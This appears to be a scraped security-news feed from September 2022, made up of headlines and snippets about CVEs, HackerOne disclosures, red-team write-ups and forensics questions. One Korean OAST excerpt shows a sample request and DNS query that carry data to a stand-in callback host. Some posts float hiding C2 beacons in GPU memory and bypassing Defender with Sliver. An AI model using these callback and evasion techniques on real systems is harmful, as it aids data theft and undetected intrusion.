    WordPress Sites Hacked via Zero-Day Vulnerability in WPGateway Plugin
    Article URL: https://thecyberexpress.com/wordpress-sites-hacked-via-zero-day-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=32854692 Points: 2 # Comments: 1
  • Open

    Speeding up Chrome on Android Startup with Freeze Dried Tabs
    We believe that "good enough" is never enough when it comes to pushing the performance of Chrome. Today’s The Fast and the Curious post explores how we sped up the startup times of Chrome on Android by more than 20% by providing an interactive freeze-dried preview of a tab on startup. Read on to see how the screenshot falls short, and freeze-drying your tabs makes for a better browser. Background and Motivation Rendering web content can be computationally intensive and can feel slow at times compared to a native application. A lot of work needs to be done to dynamically load resources over the network, run JavaScript, render CSS, fonts, etc. On mobile devices this is particularly challenging and Chrome can often only keep a handful of web pages loaded at a time due to the memory constrai…
  • Open

    Cellebrite Touch 2
    Hi all, I haven’t been working on forensics for a few years. Haven’t been up to speed with the latest and greatest on mobile forensics. Is the Cellebrite Touch 2 still a dependable solution to capture iPhones? What are your thoughts? Thanks. submitted by /u/hw60068n [link] [comments]
  • Open

    SecWiki News 2022-09-15 Review
    Google数据安全自动化建设之路(白皮书) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-09-15 Review
    Google数据安全自动化建设之路(白皮书) by ourren 更多最新文章,请访问SecWiki
  • Open

    Ahhh, This Emulation is Just Right: Introducing Micro Emulation Plans
    Written by Mike Cunningham and Jamie Williams Continue reading on MITRE-Engenuity »
  • Open

    Practical Attacks against NTLMv1
    1.1      Introduction This blog is meant to serve as a guide for practical exploitation of systems that allow for the NTLMv1 authentication protocol. While NTLMv1 is hardly ever needed anymore, a surprising number of organizations still use it, perhaps unknowingly. There are however some VPN products that still currently instruct their users to downgrade NLTM... The post Practical Attacks against NTLMv1 appeared first on TrustedSec.
  • Open

    FreeBuf早报 | 美国宣布制裁10名伊朗网军成员;六成受访者认为曾被“杀熟”
    美国财政部海外资产控制办公室9月14日宣布,对隶属于伊朗伊斯兰革命卫队(IRGC)的10名个人和两家实体实施制裁。
    前安全主管指控Twitter“重利润,轻安全”
    Twitter平台忽视了他的安全担忧,十多年来始终落后于行业安全标准。
    国外超流行的同性恋APP,被黑灰产盯上了
    攻击者通过推销各类诈骗和不安全的谷歌Chrome扩展程序域名来诱导用户。
    赠书福利 | 国内首部身份安全专业书籍《身份攻击向量》
    本书从基础概念科普和工程化实践指导角度出发,详细介绍了企业IAM相关基本概念和技术以及身份治理。
  • Open

    X and Pearl
    When X came out earlier this year, it was a competent, well-crafted tribute to ’70s slasher flicks from Ti West, but there was not much to… Continue reading on Medium »
  • Open

    My school is asking us to download and install a CA cert on personal devices to use the Wi-Fi
    Is this safe? Does this mean they will be able to see all of our activity? Any help would be appreciated! Edit: Here are the instructions they gave us: https://imgur.com/a/FkizKkS submitted by /u/coolmanic [link] [comments]
  • Open

    Break into the WiFi Network and Interact with Services
    submitted by /u/tbhaxor [link] [comments]
  • Open

    CVE-2022-34721 – Windows Internet Key Exchange (IKE) Protocol Extensions RCE
    Article URL: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34721 Comments URL: https://news.ycombinator.com/item?id=32848953 Points: 2 # Comments: 0
    Security advisories for Cargo (CVE-2022-36113, CVE-2022-36114)
    Article URL: https://blog.rust-lang.org/2022/09/14/cargo-cves.html Comments URL: https://news.ycombinator.com/item?id=32847567 Points: 4 # Comments: 0
  • Open

    Android NFC 条件竞争漏洞分析(CVE-2021-0870)
    作者:Moyun@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/ck5wwDi9hXmjtiPPfRgtXw 概述 NFC在人们的日常生活中扮演了重要角色,已经成为移动设备不可或缺的组件,NFC和蓝牙类似,都是利用无线射频技术来实现设备之间的通信。因此芯片固件和主机NFC子系统都是远程代码执行(RCE)攻击的目标。 CVE-2021-0870是一...
  • Open

    Android NFC 条件竞争漏洞分析(CVE-2021-0870)
    作者:Moyun@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/ck5wwDi9hXmjtiPPfRgtXw 概述 NFC在人们的日常生活中扮演了重要角色,已经成为移动设备不可或缺的组件,NFC和蓝牙类似,都是利用无线射频技术来实现设备之间的通信。因此芯片固件和主机NFC子系统都是远程代码执行(RCE)攻击的目标。 CVE-2021-0870是一...

  • Open

    STORED XSS in /nlc/login.aspx via "edit" GET parameter through markdown editor [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by shreky: https://hackerone.com/reports/1631447
    time based SQL injection at [https://] [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by malcolmx: https://hackerone.com/reports/1627970 - Bounty: $1000
    SQL injection at [] [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by malcolmx: https://hackerone.com/reports/1626198 - Bounty: $1000
    SQL injection at [https://] [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by malcolmx: https://hackerone.com/reports/1627995 - Bounty: $1000
    SSRF in Functional Administrative Support Tool pdf generator () [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by codeprivate: https://hackerone.com/reports/1628209 - Bounty: $4000
    an internel important paths disclosure [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by ahmed0x0mahmoud: https://hackerone.com/reports/1631471
    Full read SSRF at [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by sudi: https://hackerone.com/reports/1628102 - Bounty: $500
    Unprotected and Test site API Exposes Documents, Credentials, and Emails in Proposal System
    U.S. Dept Of Defense disclosed a bug submitted by byteone: https://hackerone.com/reports/745171
    SSRF ACCESS AWS METADATA -
    U.S. Dept Of Defense disclosed a bug submitted by 0xr3dhunt: https://hackerone.com/reports/1623685
    IDOR Lead To VIEW & DELETE & Create api_key [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by bate5a: https://hackerone.com/reports/1628012
    XSS DUE TO CVE-2022-38463 in https://
    U.S. Dept Of Defense disclosed a bug submitted by shuvam321: https://hackerone.com/reports/1681208
    springboot actuator is leaking internals at
    U.S. Dept Of Defense disclosed a bug submitted by thpless: https://hackerone.com/reports/1662474
    Directory Traversal at
    U.S. Dept Of Defense disclosed a bug submitted by 0x45: https://hackerone.com/reports/1641148
    Shop - Reflected XSS With Clickjacking Leads to Steal User's Cookie In Two Domain
    Meredith disclosed a bug submitted by error201: https://hackerone.com/reports/1221942
    Abuse cookie-modification, toast HTML and expired domain in CSP-form-action replacing login-page at www.dropbox.com/login to submit creds externally
    Dropbox disclosed a bug submitted by fransrosen: https://hackerone.com/reports/1590794 - Bounty: $6909
    Reflected XSS []
    U.S. Dept Of Defense disclosed a bug submitted by fdeleite: https://hackerone.com/reports/1309386
  • Open

    How I abused the file upload function to get a high severity vulnerability in Bug Bounty
    Hello everyone, one of the most interesting functions is file uploading, vulnerabilities in file uploads usually lead you to critical or… Continue reading on InfoSec Write-ups »
    Burp Suite Extensions to help you Pentest
    Introduction Continue reading on Medium »
    A story of Host Header injection
    Hii all, I am back with a new hacking story . A few days ago, I was hunting on one of the VPD program Where i find a host-head injection… Continue reading on Medium »
  • Open

    Codecepticon - An offensive security obfuscator for C#, VBA, and PowerShell
    submitted by /u/h0wlett [link] [comments]
    135 is the new 445: PsExec over Remote Procedure Calls
    submitted by /u/0xdea [link] [comments]
    Caching the Un-cacheables - Abusing URL Parser Confusions (Web Cache Poisoning Technique)
    submitted by /u/albinowax [link] [comments]
    Bypassing IP based brute force protection with IPv6 temporary addresses
    submitted by /u/nopslider [link] [comments]
    Attacking the Android kernel using the Qualcomm TrustZone
    submitted by /u/jeandrew [link] [comments]
    How Cymulate Discovered an Abuse Risk in Google Cloud Platform (GCP)
    submitted by /u/cutboxhe [link] [comments]
  • Open

    Gambling Spam in Visual Composer Raw HTML Element: [vc_raw_html]
    Bad actors often look for clever ways to boost the rankings and visibility of their spam pages in search. One of the many black hat SEO injections that we regularly find on compromised sites involves spammy links hidden inside a with the following style “overflow:hidden;height:1px” that makes them invisible to a regular site visitor. Our SiteCheck scanner detects these SEO link injections as “spam-seo.hidden_content?68.5”. Continue reading Gambling Spam in Visual Composer Raw HTML Element: [vc_raw_html] at Sucuri Blog.
  • Open

    Showcasing Sliver C2, Bypassing Win Defender and Establishing Persistence
    To be honest, sliver is the big deal. It's a brand new C2 Framework (still in development) and really have a lot of potential. We showcased how to work with it and perform various TTPs, like persistence with exe hijacking or registry tweaking. The very default beacon was able to bypass Windows 10 Defender. I learned a lot (and was learning in real time while streaming, so I put timestamps for you to navigate it easier) and hope you will learn something new from the video too. It is available on my Youtube: https://youtu.be/QO_1UMaiWHk submitted by /u/lsecqt [link] [comments]
    Decrypt WEP Traffic using Bruteforce with Insufficient IVs
    submitted by /u/tbhaxor [link] [comments]
    Hydra
    So I'm trying to use hydra to brute force a password check. It's for a class on VMs. How can I pull just logins from Active Directory? I've been able to pull users, but it's their legal names and not their logins. Then in Hydra, how do I know what protocol to use? submitted by /u/w_sohl [link] [comments]
  • Open

    Movies, some TV shows
    submitted by /u/ilikemacsalot [link] [comments]
  • Open

    SecWiki News 2022-09-14 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-09-14 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    White-Box and Black-Box Fuzzing for GraphQL APIs
    Article URL: https://arxiv.org/abs/2209.05833 Comments URL: https://news.ycombinator.com/item?id=32838301 Points: 1 # Comments: 0
  • Open

    Cloudflare Domain Verification
    Hi, I think I may be missing something very straightforward but it's not connecting in my head just yet. How does Cloudflare verify that you own the domain zone when you sign up and "Add a site"? I added a domain and just had to set my DNS nameservers to "jake.ns.cloudflare.com" and "marlowe.ns.cloudflare.com". These nameservers aren't unique to my domain zone right? So what if I was trying to hijack the Cloudflare config for another site and they already had these nameservers set up? Does Cloudflare check to see if there are existing CF nameservers and then ask the user to change them to a different pair? Hope my question makes sense. Appreciate any insight from this community. submitted by /u/createdforrequest [link] [comments]
  • Open

    Red Team Threat Intel TryHackMe
    https://tryhackme.com/room/redteamthreatintel Continue reading on Medium »
    Cyber Kill Chain TryHackMe
    Reconnaissance Continue reading on Medium »
    What to Consider Before Starting a Security Red Team Engagement?
    Cyber security red-teaming is a rather new paradigm. A few years ago when we started providing red-team as a service, all references for… Continue reading on Medium »
    Brute force domain cached credentials
    Have I always been able to brute force domain cached credentials just by disabling the network or is my AD lab messed up? I’m sure this… Continue reading on Medium »
  • Open

    FreeBuf早报 | Google和Meta被罚千亿韩元;吹哨人指控Twitter“重利润,轻安全”
    Google 和 Meta 涉嫌在韩国未经用户同意收集个人信息并将此用于在线投放个性化广告,分别被罚 692 亿韩元和 308 亿韩元。
    重磅消息,《网络安全法》或迎来修改
    此次修改将进一步做好相关法律的衔接协调,完善法律责任制度,保护个人、组织在网络空间的合法权益。
    大手笔!谷歌花54亿美金收购网络安全公司 Mandiant
    Google宣布以54亿美金收购网络安全公司 Mandiant,未来Mandiant将在谷歌云的支持下运营,其品牌依旧存在。
    工控攻击!黑客组织GhostSec 称入侵以色列55 家Berghof PLC
    该网络攻击行为被视为“解放巴勒斯坦”运动的组成部分。
  • Open

    【安全通报】2022年9月微软漏洞补丁日修复多个高危漏洞
    近日,微软发布 2022年9月 安全补丁,修复了针对 38 款微软产品的 63 个漏洞,其中18个权限提升漏洞,1个安全功能绕过漏洞,30个远程代码执行漏洞,7个信息泄露...
  • Open

    【安全通报】2022年9月微软漏洞补丁日修复多个高危漏洞
    近日,微软发布 2022年9月 安全补丁,修复了针对 38 款微软产品的 63 个漏洞,其中18个权限提升漏洞,1个安全功能绕过漏洞,30个远程代码执行漏洞,7个信息泄露...
  • Open

    CVE-2022-31625: PHP Vulnerability due to uninitialized array
    No content preview
    How to start Penetration testing of Artificial Intelligence
    Pentesting needs to evolve to find AI based risks Continue reading on InfoSec Write-ups »
    Attacking GPP (Group Policy Preferences) Credentials | Active Directory Pentesting
    No content preview
  • Open

    CVE-2022-31625: PHP Vulnerability due to uninitialized array
    No content preview
    How to start Penetration testing of Artificial Intelligence
    Pentesting needs to evolve to find AI based risks Continue reading on InfoSec Write-ups »
    Attacking GPP (Group Policy Preferences) Credentials | Active Directory Pentesting
    No content preview
  • Open

    CVE-2022-31625: PHP Vulnerability due to uninitialized array
    No content preview
    How to start Penetration testing of Artificial Intelligence
    Pentesting needs to evolve to find AI based risks Continue reading on InfoSec Write-ups »
    Attacking GPP (Group Policy Preferences) Credentials | Active Directory Pentesting
    No content preview
  • Open

    基于图卷积神经网络的 web 登录入口识别方法
    作者:Alfy@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/MtFZc1Zv6uNo25ORNijpaQ 什么是web登录入口 目前,大多数Web站点都具备身份验证的功能,防止非授权访问。web站点中每个账户都有特定的操作权限,如果非授权用户能够通过非常规的方式(如弱口令爆破、窃取他人的用户名口令等)登录他人账户,则可能造成站点用户信息泄露、站...
    二进制漏洞学习笔记 - PWN 篇
    作者:b1cc@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/1KoRr53tNryUKT4P1r7n6A 本文是笔者初学pwn的知识梳理,如有错误之处,敬请斧正。 栈溢出漏洞 原理 栈是一种后进先出的数据结构。在调用函数的时候,都会伴随着函数栈帧的开辟和还原(也称平栈)。栈结构示意图如下(以32位程序为例): 如图所示,栈空间是从高地址向低地...
    +1进阶,护航未来 | KCon 2022 黑客大会部分议题 PPT 公布
    2022年8月27日至28日,盛夏落幕,初秋刚至。在万物更替的时节,KCon以全新的形式庆贺了十一周岁的生日。前十年,KCon一直行走在探索与分享网络攻防技术的道路上,也收获了众多同伴的支持。第十一年,KCon迈步新生,以“+1”的决心和动作开启了新十年。 2022年 KCon首次采用全线上直播且免费参与的方式,中国信息安全、嘶吼、数说安全、蘑菇云4家媒体同步线上转播。两天时间,热情观众为K...
  • Open

    基于图卷积神经网络的 web 登录入口识别方法
    作者:Alfy@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/MtFZc1Zv6uNo25ORNijpaQ 什么是web登录入口 目前,大多数Web站点都具备身份验证的功能,防止非授权访问。web站点中每个账户都有特定的操作权限,如果非授权用户能够通过非常规的方式(如弱口令爆破、窃取他人的用户名口令等)登录他人账户,则可能造成站点用户信息泄露、站...
    二进制漏洞学习笔记 - PWN 篇
    作者:b1cc@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/1KoRr53tNryUKT4P1r7n6A 本文是笔者初学pwn的知识梳理,如有错误之处,敬请斧正。 栈溢出漏洞 原理 栈是一种后进先出的数据结构。在调用函数的时候,都会伴随着函数栈帧的开辟和还原(也称平栈)。栈结构示意图如下(以32位程序为例): 如图所示,栈空间是从高地址向低地...
    +1进阶,护航未来 | KCon 2022 黑客大会部分议题 PPT 公布
    2022年8月27日至28日,盛夏落幕,初秋刚至。在万物更替的时节,KCon以全新的形式庆贺了十一周岁的生日。前十年,KCon一直行走在探索与分享网络攻防技术的道路上,也收获了众多同伴的支持。第十一年,KCon迈步新生,以“+1”的决心和动作开启了新十年。 2022年 KCon首次采用全线上直播且免费参与的方式,中国信息安全、嘶吼、数说安全、蘑菇云4家媒体同步线上转播。两天时间,热情观众为K...
  • Open

    In what way can you step your leg into this industry?
    I’ve been scrolling through LinkedIn, Handshake, Indeed, etc job sites all of these positions require some experience level of DF from a job. Even internships are harder to land. I applied to a Special Investigations posting that analyzes Malware but outside of that I think it’s harder if you don’t have law enforcement or Military experience. I would not be surprised if people with Cyber Security degrees are stumping out those with Computer Forensic degrees because as opposed to Cyber Sec this industry has no entry level jobs. It’s all on a whim. submitted by /u/Beercanadawhiskey [link] [comments]
    GETTING ENTRY LEVEL JOB WITHOUT DEGREE
    Hello, I am a high school senior debating wether or not going to college. Here is my reasoning. My goal job is blockchain/cybercrime investigator with a blockchain company, or maybe even starting my own company. Now, I did some research on the people who have these crime investigator jobs, and most of them went to college for unrelated studied, with some not even going to college at all, most had a career background in cyber law enforcement jobs. So now my question can i get some reputable certificates on my resume, get a entry level digital forensics job, even with a lower salary, then after 4 years advance to cybercrime investigator position with a 140k+ salary. Because why go use 4 of the best years of your life and spend an absurd amount of money to get degree you probably wont even use, when you can work those 4 years at a job you enjoy and earn some money to invest by the time your in your early 20s. For reference, I will be graduating high school at 17 and will have about 8 months till I turn 18, so my plan would be getting as many reputable certifications as possible in that time, then looking for a entry level position as soon as i turn 18. Please let me know if you think this is possible and any food cert suggestions. submitted by /u/WannabeCyberSecurity [link] [comments]
    email forensics searches
    hi all! new to ediscovery and have been asked to collect emails between two individuals. the time frame is going back two months and am looking for anything related to "tender requests" what would be the best way to set up search queries to narrow down the field of emails? ex: any sender from [sender1@yahoo.com](mailto:sender1@yahoo.com) to any receiver [sender2@gmail.com](mailto:sender2@gmail.com)? is it better to do keyword search on entire message vs subject only? any suggestions welcomed pls submitted by /u/justlikebadmedicine [link] [comments]

  • Open

    Any known case studies on a beacon’s logic executing from within a GPU compute shader?
    I’ve been tinkering with writing a chess engine as this fun security engineering project write-up where the vulnerable chess web app uses peer-to-peer and the attacker exploits the victim peer, the pieces start breaking the rules, we use memory forensics to try to analyze and detect the exploitation heuristically via dynamic run-time analysis with baselining… Anyway, I digress. As part of this project I’m thinking a lot about chess engines and wonder: Hmm, I could probably write a chess sim inside a GPU compute shader to calculate a large number of variations in parallel. Then it struck me: If I can do that, couldn’t we write beacons which mostly execute their malicious code within a GPU shader, then pass the I/O in and out of a more benign process? You’d still need to do some stuff on the CPU (any effects on target), but with popular C2 frameworks you have this significant, sort of robust beacon agent code injected in a process to be detected. Sleep masking hides it from memory scanning kinda sorta, but not really against good defensive techniques. Seems like you could hide most of that memory signature inside a GPU compute shader and have much less “robust” code (essentially attack surface for defenders to use for detection) in RAM. Doubt any EDRs out there are scanning VRAM… Even if you did zero processing in a shader, even just hiding data in VRAM when not in-use (example: sleep masking) seems interesting on its own. Maybe someone’s heard of such a thing? Google is terrible with results when “GPU” and “red team” point to non-cyber branding slang. Google Scholar also turned up nothing. submitted by /u/Jonathan-Todd [link] [comments]
  • Open

    Red Team Part 5 — Intro to C2 | TryHackMe
    Hello world and welcome to HaXeZ where today we’re going to be getting a bit more technical and looking at C2s. To clarify, C2 is short… Continue reading on Medium »
    Red Team Part 3 — Red Team Threat Intel | TryHackMe
    Hello world and welcome to HaXeZ, in this post we’re going to be walking through the 3rd Red Team challenge in the Red Team Fundamentals… Continue reading on Medium »
    Red Team Recon
    In a red team operation, you might start with no more than a company name, from which you need to start gathering information about the… Continue reading on Medium »
  • Open

    Try Hack Me — OhSINT CTF
    Try Hack Me hosts a small number of OSINT CTF’s. I completed the geolocation one some time ago, so thought i’d come back and take a look… Continue reading on Medium »
    Intel101 OSINT CTF Writeup
    Here’s my writeup of the Intel101 OSINT CTF by Champlain College on CyberDefenders, including solutions (spoiler alert!). The challenges… Continue reading on Medium »
    YUCTF Job Interview Write up
    Challenge name: Job Interview Continue reading on Medium »
  • Open

    CSRF in Changing User Verification Email
    TikTok disclosed a bug submitted by f_m: https://hackerone.com/reports/1531235 - Bounty: $500
    Web Cache Poisoning leads to XSS and DoS
    Glassdoor disclosed a bug submitted by nokline: https://hackerone.com/reports/1621540 - Bounty: $1700
    XSS in http://www.glassdoor.com/Search/results.htm via Parameter Pollution
    Glassdoor disclosed a bug submitted by nokline: https://hackerone.com/reports/1632119 - Bounty: $500
    DOS validator nodes of blockchain to block external connections
    Hyperledger disclosed a bug submitted by cre8: https://hackerone.com/reports/1695472 - Bounty: $1500
    No Restriction on password
    GitLab disclosed a bug submitted by patronum-m: https://hackerone.com/reports/1696814
    ReDoS in net/http affects webhooks: Sidekiq job stuck at 100% CPU for a year
    GitLab disclosed a bug submitted by afewgoats: https://hackerone.com/reports/1531958 - Bounty: $1160
    RCE via the DecompressedArchiveSizeValidator and Project BulkImports (behind feature flag)
    GitLab disclosed a bug submitted by vakzz: https://hackerone.com/reports/1609965 - Bounty: $33510
  • Open

    Mac Imaging Question
    Hello, do any of the veterans have a suggestion of how to take a logical image of a Mac machine remotely? I am considering the dd command to take the image and storing to an external drive. Are there any more reconnended or "forensically sound" ways to do this? I can not use digital collector in this situation since it's off-site. Thank you for any advice! submitted by /u/Fun_House2633 [link] [comments]
    I Want to learn how to start a investigation project through Autopsy
    Not relatively new to this field but I want to start my first project that I can put on my resume. Im kind of loss on which tools to use as well outside of FTK Imager, Infranview and Autopsy. submitted by /u/OhmyMary [link] [comments]
    Choice of Online Masters Degrees for Digital Forensics?
    Hello, I'm graduating soon with a BS in Cybersecurity and just started my first security analyst job. However, I'm interested in studying digital forensics and pivoting into that area. I'm wondering what the good choices are for 100% online masters degree programs for Digital Forensics. Based on my own research so far I've read good things about Champlain College and SANS. There is also University of the Cumberlands and University of Central Florida but not sure how all these choices compare in terms of preparing students for career readiness and school reputation. Also, recommendations for other schools are great too. Any insight on this would be greatly appreciated. Thank you. submitted by /u/Nurith [link] [comments]
    Tableau Forensic SATA/IDE bridge T35u problem
    Hello everyone, Just got this kit to try out and recover some data from an old 160GB (PATA) HDD drive. I connected everything as should and the firmware of the Tableau is up to date. When i connect to my laptop through USB and power the T35u, my laptop doesn't get recognized as a host and he also does not find the drive. The drive is not broken since i can hear him running. Also, i was able to find the device on my PC in update mode, so no cables are broken. My laptop is a MSI GF65 with windows 11 as OS. Can anyone please help me? ​ ​ https://preview.redd.it/m1rc0raqwmn91.png?width=923&format=png&auto=webp&s=e0b6b7b59913fdc685b8eb04d351290b82078129 submitted by /u/Charles_IT_Drive [link] [comments]
    Remote Disk Imaging Solutions
    My org is moving towards allowing WFH to be permanent. With that, are there any good solutions for remote disk imaging via the internet as the vpn may not be on? submitted by /u/devilish_kevin_bacon [link] [comments]
    Getting started with Velociraptor IR - so many features for endpoint monitoring and DFIR
    submitted by /u/DFIRScience [link] [comments]
    Resources for disk image formats?
    Does anybody have some good resources (internet, books etc.) for finding some common disk image formats like ISO, VDI and VMDK to see how they differ and which one would be the easiest for analyzing? I have to build a tool that analyzes one of those formats without downloading the whole image and I can't quite find any good resources. So any help is appreciated! submitted by /u/abdell_071 [link] [comments]
  • Open

    Hacking Unity Games with Malicious GameObjects, Part 2
    submitted by /u/haxboxone [link] [comments]
    Introducing CloudFox: Automating situational awareness for cloud penetration tests
    submitted by /u/sethsec [link] [comments]
  • Open

    SecWiki News 2022-09-13 Review
    KCon 2022 Slide by ourren 一个科技平台型企业的网络安全建设心得 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-09-13 Review
    KCon 2022 Slide by ourren 一个科技平台型企业的网络安全建设心得 by ourren 更多最新文章,请访问SecWiki
  • Open

    OAST에 Hint를 더하다
    OAST(OOB)를 통한 테스팅 방법은 몇년 사이 정말 많은 발전이 있었습니다. Burpsuite의 Collaborator를 시작으로 Project Discovery의 interactsh, ZAP의 OAST 등 여러 도구들이 나타나고 이를 기반으로 한 테스팅 방법들이 연구되자 OAST 자체가 여러 취약점을 식별할 수 있는 좋은 방법으로 떠오르게 되었는데요. 그래서 오늘은 OAST 기반의 테스팅에서 좀 더 많은 정보를 얻기 위한 노력들, 그리고 각 도구들이 앞으로 고려하게 될 방향에 대한 이야기를 하려고 합니다. OAST에 대해 더 자세히 알고 싶다면 Cullinan > OAST 문서를 참고해주세요! Drop a hint OAST로 인한 OOB는 언제 어떻게 발생할지 알 수 없습니다. 그래서 약간의 트릭을 사용하여 OOB 요청에서 힌트를 얻을 수 있도록 정보를 추가할 수 있습니다. HTTP HTTP Request는 데이터를 담을 수 있는 구간이 많기 때문에 URL Query 또는 POST Body나 Header 등으로 데이터를 요청시킬 수 있습니다. RCE 계통을 제외하면 Body나 Header는 통제하기 어렵기 때문에 보통 URL Query를 많이 활용하곤 합니다. GET /callback?data= .... HTTP/1.1 Host: oast.service DNS OAST로 인한 DNS Query에는 정보를 담을 필드가 많이 모자랍니다. 그래서 이때는 Subdomain을 활용하여 정보를 전달할 수 있습니다. DNS_A custom_info.oast.service ;; opcode: QUERY, status: NOERROR, id: 34903 ;; flags: cd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1 OAST 시 DNS 정보에 리소스를 포함하여 체크하는 방식은 작년 말에 있었던 Log4Shell 이슈에서 많이 사용되어 알려졌습니다. 이 때 취약 대상을 빠르게 식별하기 위해...
  • Open

    Suppose an SSH relay / jumphost gets fully compromised. What could an attacker accomplish?
    Conventionally SSH relays were being used using agent forwarding, but I've come to understand that a more secure way is to use a jumphost with the ProxyCommand, as described in this article for example. So in this setup, suppose the attacker gained full root privileges on the relay / jumphost. What kind of damage is the attacker able to do? Are the clients or end-servers under any risk? submitted by /u/forevernooob [link] [comments]
    Why is it called Ingress / Egress instead of Inbound and Outbound
    Hi AskNetSec, I remember when I first started out Inbound and Outbound Rules were used as the terminology for firewall and networks. These days it seems to be Ingress and Egress why did we swap? submitted by /u/CyberStagist [link] [comments]
  • Open

    Exploiting OAuth authentication vulnerabilities Part III
    No content preview
  • Open

    Exploiting OAuth authentication vulnerabilities Part III
    No content preview
  • Open

    Exploiting OAuth authentication vulnerabilities Part III
    No content preview
  • Open

    How Your Team’s Culture Determines the Value of Your Tabletop Exercise
    A tabletop exercise (TTX) measures more than an organization’s technical capabilities and adherence to an incident response plan—it facilitates the confluence of personalities and team cultures, in turn revealing friction not only in processes but also in team dynamics. The success of an organization’s response in both a TTX scenario and, more importantly, a real-world... The post How Your Team’s Culture Determines the Value of Your Tabletop Exercise appeared first on TrustedSec.
  • Open

    OriginLogger: A Look at Agent Tesla’s Successor
    We provide an overview of the OriginLogger keylogger, including info on a dropper lure and OriginLogger’s configuration and infrastructure. The post OriginLogger: A Look at Agent Tesla’s Successor appeared first on Unit 42.
  • Open

    Exploiting OAuth authentication vulnerabilities Part III
    OAuth Exploitation Continue reading on InfoSec Write-ups »
    How to create a port scanner with bash script in one minute
    Hello everyone, today I will show you how to create a Port Scanner in a minute on your Linux or any system with netcat installed. Continue reading on Medium »
  • Open

    Mirai 恶意软件变体 MooBot 瞄准 D-Link 设备
    作者:Chao Lei, Zhibin Zhang, Cecilia Hu, Aveek Das 译者:知道创宇404实验室翻译组 原文链接:https://unit42.paloaltonetworks.com/moobot-d-link-devices/ 执行摘要 8月初,Unit 42研究人员发现攻击利用了D-Link(一家专门从事网络和连接产品的公司)制造的设备中的多个漏洞。被利用的...
    CTF 中 linux 内核态的漏洞挖掘与利用
    作者:lawhackzz@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/VsGVvi_Vog1aKi0Cj9haGg 本篇文章主要针对内核栈溢出以及堆越界访问漏洞进行分析以及利用。 qwb2018 core 题目链接:https://pan.baidu.com/s/10te2a1LTZCiNi19_MzGmJg 密码:ldiy 解压官方给的tar...
    KCon 2022 议题分享:自动化 API 漏洞挖掘
    作者:周阳、吕竭@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/MCtwiT93Fo9Js9ekuD-8wA 演讲者介绍 周阳 星阑科技安全研发工程师。具有丰富的漏洞研究及红队武器化经验,历经主机漏洞扫描、应用漏洞扫描、开源软件供应链安全跟踪以及漏洞情报管理平台等多款产品建设,曾参与发现多个linux系统安全漏洞并收到工信部及其他部委致谢。目前...
  • Open

    Mirai 恶意软件变体 MooBot 瞄准 D-Link 设备
    作者:Chao Lei, Zhibin Zhang, Cecilia Hu, Aveek Das 译者:知道创宇404实验室翻译组 原文链接:https://unit42.paloaltonetworks.com/moobot-d-link-devices/ 执行摘要 8月初,Unit 42研究人员发现攻击利用了D-Link(一家专门从事网络和连接产品的公司)制造的设备中的多个漏洞。被利用的...
    CTF 中 linux 内核态的漏洞挖掘与利用
    作者:lawhackzz@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/VsGVvi_Vog1aKi0Cj9haGg 本篇文章主要针对内核栈溢出以及堆越界访问漏洞进行分析以及利用。 qwb2018 core 题目链接:https://pan.baidu.com/s/10te2a1LTZCiNi19_MzGmJg 密码:ldiy 解压官方给的tar...
    KCon 2022 议题分享:自动化 API 漏洞挖掘
    作者:周阳、吕竭@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/MCtwiT93Fo9Js9ekuD-8wA 演讲者介绍 周阳 星阑科技安全研发工程师。具有丰富的漏洞研究及红队武器化经验,历经主机漏洞扫描、应用漏洞扫描、开源软件供应链安全跟踪以及漏洞情报管理平台等多款产品建设,曾参与发现多个linux系统安全漏洞并收到工信部及其他部委致谢。目前...
  • Open

    macOS leaves users vulnerable, and unaware of their vulnerability
    Article URL: https://eclecticlight.co/2022/09/13/how-macos-leaves-users-vulnerable-and-unaware-of-their-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=32821699 Points: 35 # Comments: 11
  • Open

    VMware Tools本地提权漏洞CVE-2022-31676分析与复现(1)
    VMware Tools本地提权漏洞CVE-2022-31676分析与复现(1)
    FreeBuf早报 | 谷歌花54亿美元收购Mandiant;黑客企图入侵韩国政府56万次
    Google 提议 54 亿美元收购网络安全公司 Mandiant 的交易现在已经完成
    思科确认 Yanluowang 勒索软件团伙泄露了公司数据
    思科公司已经确认 Yanluowang 勒索软件团伙泄露的数据是黑客在5月份一次网络攻击中从该公司网络中窃取的。
    大事件!乌方:网络攻击已瘫痪俄罗斯2400个网站
    乌克兰IT军队在8月29日至9月11日的两周内,攻击了2400多个俄罗斯网站,其中包括俄罗斯联邦最大银行。
    健康医疗数据跨境流动合规分析
    医疗健康数据不仅事关患者生命安全、个人信息权益,还关乎社会公共利益和国家安全。
    黑客利用伪造的弹出登录窗口窃取Steam帐户
    这是一种正逐步流行的攻击手法,主要是在活动窗口中创建伪造的登录页面,通常为用户所要登录服务的弹出页。

  • Open

    monerod JSON RPC server remote DoS
    Monero disclosed a bug submitted by m31007: https://hackerone.com/reports/1511843
